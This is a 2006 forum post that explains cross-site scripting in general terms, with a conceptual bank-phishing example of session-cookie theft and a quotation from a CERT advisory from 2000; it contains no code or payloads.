Trilight Zone Forum Index Trilight Zone
Privacy & Anonymity is our speciality !
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

How to defeat the new No. 1 security threat:

 
Post new topic   Reply to topic    Trilight Zone Forum Index -> Security
Author Message
tricore
Guest
PostPosted: Mon Dec 18, 2006 5:44 am    Post subject: How to defeat the new No. 1 security threat: Reply with quote
Cross-site scripting, often abbreviated XSS, is a class of Web security issues. A recent research report stated that XSS is now the top security risk.

In a typical XSS scenario, a Web page might use JavaScript to dynamically generate some document content based on a field in a Uniform Resource Identifier (URI). In the normal course of events, the site itself would generate legitimate information for that field.

If, however, the script that generated the new content did not filter the URI, it would be possible for an attacker to feed the page a custom-designed URI that ran a script. The script could do almost anything, and the user would never know that he wasn't seeing legitimate content unless the hijacker was blatant.

This is potentially very bad, since it is one way to enable phishing. For example, suppose a Web page with a cross-site scripting vulnerability belonged to a bank. An attacker aware of the vulnerability could forge e-mails purporting to be from the bank, with URIs that indeed led to the bank's site, but contained some malicious script that wouldn't be obvious to a casual observer. Once a user clicked on the link in the e-mail and logged into the bank site, their login credentials (in the form of cookies) for the current session would be transmitted to the attacker, who would be able to take over the user's account as long as the session was active.

This is considerably worse than an attack that takes users to a forged Web page, because it can, in principle, bypass most forms of authentication protection. After all, it's using the bank's own authentication system, and then hijacking the results. David Flanagan, author of JavaScript: The Definitive Guide, says cross-site scripting "enables a pernicious vulnerability whose roots go deep into the architecture of the Web."

Some history

Cross-site scripting first received wide notice in February 2000, when CERTŪ Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests was published. The original summary was:

"A Web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a Web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user."
The systems affected were listed as "Web browsers" and "Web servers that dynamically generate pages based on unvalidated input."
Back to top
Display posts from previous:   
Post new topic   Reply to topic    Trilight Zone Forum Index -> Security All times are GMT
Page 1 of 1

 


Powered by phpBB © 2001, 2005 phpBB Group